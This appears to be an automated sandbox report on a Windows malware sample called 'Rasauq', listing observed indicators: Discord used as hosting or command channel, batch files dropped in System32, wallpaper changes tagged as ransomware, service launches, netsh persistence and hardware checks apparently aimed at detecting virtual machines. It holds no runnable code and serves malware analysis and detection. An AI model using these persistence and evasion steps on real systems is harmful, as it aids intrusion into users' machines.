File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\Rasauq\$77RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\Rasauq\$77RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\system32\Recovery C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\system32\Recovery\ReAgent.xml C:\Windows\system32\ReAgentc.exe N/A
File created C:\Windows\System32\$666-RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\$666-RasauqBroker.bat C:\Windows\system32\cmd.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" C:\Windows\system32\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\system32\ReAgentc.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\powercfg.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software C:\Windows\system32\reg.exe N/A
